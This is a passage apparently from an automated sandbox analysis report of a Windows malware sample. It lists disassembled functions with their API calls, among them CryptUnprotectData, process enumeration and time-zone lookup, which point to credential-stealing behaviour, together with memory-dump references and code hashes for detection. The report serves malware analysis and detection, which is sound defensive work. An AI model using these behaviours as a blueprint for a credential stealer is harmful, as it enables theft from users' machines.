                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 2609814428-0
                                  • Opcode ID: c160f50870284f99dcef4f2f9dac5d4208299906d42e6625eaa290ada61631e0
                                  • Instruction ID: a6ca54f58cea259d723c6f3192a5bc6bd1cf9f3f2c2f83000002e73555609f00
                                  • Opcode Fuzzy Hash: c160f50870284f99dcef4f2f9dac5d4208299906d42e6625eaa290ada61631e0
                                  • Instruction Fuzzy Hash: 6C0112B5A58308BBDB10DFE4DC45F9DB779AB44B00F204545FB05AB3C0D670AA409B65
                                  Function 006C9790 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006C97AE
                                  • Process32First.KERNEL32(006D0ACE,00000128), ref: 006C97C2
                                  • Process32Next.KERNEL32(006D0ACE,00000128), ref: 006C97D7
                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 006C97EC
                                  • CloseHandle.KERNEL32(006D0ACE), ref: 006C980A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 420147892-0
                                  • Opcode ID: 53ec8517e81496e3b859f1668a4ce2532522ad2342d65dbee6a99c4493b0ca75
                                  • Instruction ID: 455e51acc37877878ece7917afde6a48d878e0bb735f1ecfcd90f2d09d23429a
                                  • Opcode Fuzzy Hash: 53ec8517e81496e3b859f1668a4ce2532522ad2342d65dbee6a99c4493b0ca75
                                  • Instruction Fuzzy Hash: 1201E575A19208EBDB20DFA4CD48BEDBBB9EB09700F104588E509A7240EB34EA40DB60
                                  Function 006D4573 Relevance: 7.3, Strings: 2, Instructions: 4819COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: <7\h$huzx
                                  • API String ID: 0-2989614873
                                  • Opcode ID: 5ad81d8ce2962f1179e9fe578e10dae7d707d0099e23833bef367620ab0b1e35
                                  • Instruction ID: 26922f768643af94e4afaafb6dbafef10940717d1e9812659a51d9b71f2d987a
                                  • Opcode Fuzzy Hash: 5ad81d8ce2962f1179e9fe578e10dae7d707d0099e23833bef367620ab0b1e35
                                  • Instruction Fuzzy Hash: A263333281EBD41EC727DB3087B65917F67BA1361031949CFC4C28FAB3C6949A1AE356
                                  Function 00B01079 Relevance: 6.6, Strings: 4, Instructions: 1624COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 7O{$GvW$hs>$iK}v
                                  • API String ID: 0-4205074937
                                  • Opcode ID: 226395440817efbe9e38ca6e9f50ebc1764e82744570ae9d74f5b61148cef8ae
                                  • Instruction ID: f835f31b6e97f54e61f575d79f36705d3ee993e48132e56de3cb4883e72ef10e
                                  • Opcode Fuzzy Hash: 226395440817efbe9e38ca6e9f50ebc1764e82744570ae9d74f5b61148cef8ae
                                  • Instruction Fuzzy Hash: 28B2F6F3A0C2149FE304AE2DEC8567ABBE5EF94720F16853DEAC4C3744EA3558058697
                                  Function 006C9030 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(00000000,006B51D4,40000001,00000000,00000000,?,006B51D4), ref: 006C9050
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptString
                                  • String ID:
                                  • API String ID: 80407269-0
                                  • Opcode ID: da16b6ad0bf2636a2ff50e741e2942ca69da57d0b8a4a32d5b21372a7606eea0
                                  • Instruction ID: 1692620332bd1769390f4be623cbad77b1cc59d2853f98ba95b24f2d2e8e8daa
                                  • Opcode Fuzzy Hash: da16b6ad0bf2636a2ff50e741e2942ca69da57d0b8a4a32d5b21372a7606eea0
                                  • Instruction Fuzzy Hash: 2111C875214205EFDB04CF94D889FBA73AAEF89310F20855CF9198B350D775E9419BA4
                                  Function 006C7B10 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,006D0DE8,00000000,?), ref: 006C7B40
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006C7B47
                                  • GetLocalTime.KERNEL32(?,?,?,?,?,006D0DE8,00000000,?), ref: 006C7B54
                                  • wsprintfA.USER32 ref: 006C7B83
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 377395780-0
                                  • Opcode ID: b47c72af6776858349e0f04cd39893cc8a7abb5d7eed97f8888a20cce2427afa
                                  • Instruction ID: 36aea88a63faac17fab2a219a08fc13365930d8e7e24a1e31a42d6a33a19c02e
                                  • Opcode Fuzzy Hash: b47c72af6776858349e0f04cd39893cc8a7abb5d7eed97f8888a20cce2427afa
                                  • Instruction Fuzzy Hash: 7F1118B2918118AACB149FC9DD45FBEF7B8EB4CB11F10411AF615A2280D2399940D7B0
                                  Function 006C7BC0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0147E410,00000000,?,006D0DF8,00000000,?,00000000,00000000), ref: 006C7BF3
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006C7BFA
                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0147E410,00000000,?,006D0DF8,00000000,?,00000000,00000000,?), ref: 006C7C0D
                                  • wsprintfA.USER32 ref: 006C7C47
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                  • String ID:
                                  • API String ID: 3317088062-0
                                  • Opcode ID: f29a6d615b2aa0c71e41dd8c89145b45276d85a0dc16c2e4e0d9fcdca1a5fbed
                                  • Instruction ID: 3028bd9c1ae27df982c6243349fafcb9ed7740d9364d2b3d94cf1578f6dbdae9
                                  • Opcode Fuzzy Hash: f29a6d615b2aa0c71e41dd8c89145b45276d85a0dc16c2e4e0d9fcdca1a5fbed
                                  • Instruction Fuzzy Hash: 04118EB1909219EFEB208B54DC49FA9B778FB44711F100799F619A33D0D7745A409F50
                                  Function 00B02C4F Relevance: 5.4, Strings: 3, Instructions: 1621COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: EY=Z$acwm$'?}
                                  • API String ID: 0-3927454116
                                  • Opcode ID: a54d057fa96f49f85f0dea4dd771e925dac1da7ef2c99ae443449a92433c23a2
                                  • Instruction ID: e82b42f16401447ed3782a1e1091078e51ee20bae5b3714e0c71f1df3a17e79d
                                  • Opcode Fuzzy Hash: a54d057fa96f49f85f0dea4dd771e925dac1da7ef2c99ae443449a92433c23a2
                                  • Instruction Fuzzy Hash: 02B24AF3A0C2049FE304AE2DEC8567AFBE5EF94320F1A863DE6C4D7744E93559058692
                                  Function 006C3970 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CoCreateInstance.COMBASE(006CE120,00000000,00000001,006CE110,00000000), ref: 006C39A8
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 006C3A00
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWide
                                  • String ID:
                                  • API String ID: 123533781-0
                                  • Opcode ID: a38475b7333f083f2e85c3bd28b191e9a81efc9ed5a4f0999c707a142891e06e
                                  • Instruction ID: 17ef35f4e05f305694c81591b7b4995f39efa32764f15f294f3f65d2805dd4dd
                                  • Opcode Fuzzy Hash: a38475b7333f083f2e85c3bd28b191e9a81efc9ed5a4f0999c707a142891e06e
                                  • Instruction Fuzzy Hash: 5941E970A40A289FDB24DB54CC95FABB7B5FB48702F5081D8E618E7290D771AE85CF50
                                  Function 006BA2B0 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 006BA2D4
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 006BA2F3
                                  • LocalFree.KERNEL32(?), ref: 006BA323
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                  • String ID:
                                  • API String ID: 2068576380-0
                                  • Opcode ID: 8378d067d0ef68ac0e6aa848b68ec9953484e469c373299d42c7602dae59ddec
                                  • Instruction ID: a0532546bd898d30d8dcad623b17cf23e6474c7d5c746ccf9e30d23486647c38
                                  • Opcode Fuzzy Hash: 8378d067d0ef68ac0e6aa848b68ec9953484e469c373299d42c7602dae59ddec
                                  • Instruction Fuzzy Hash: 4111E5B8A00209EFCB04DFA8D884AAEB7B5FB88300F108559ED15A7390D730AE50CB61
                                  Function 00B07DF6 Relevance: 4.1, Strings: 2, Instructions: 1609COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: #d7?$Y.JA
                                  • API String ID: 0-719740578
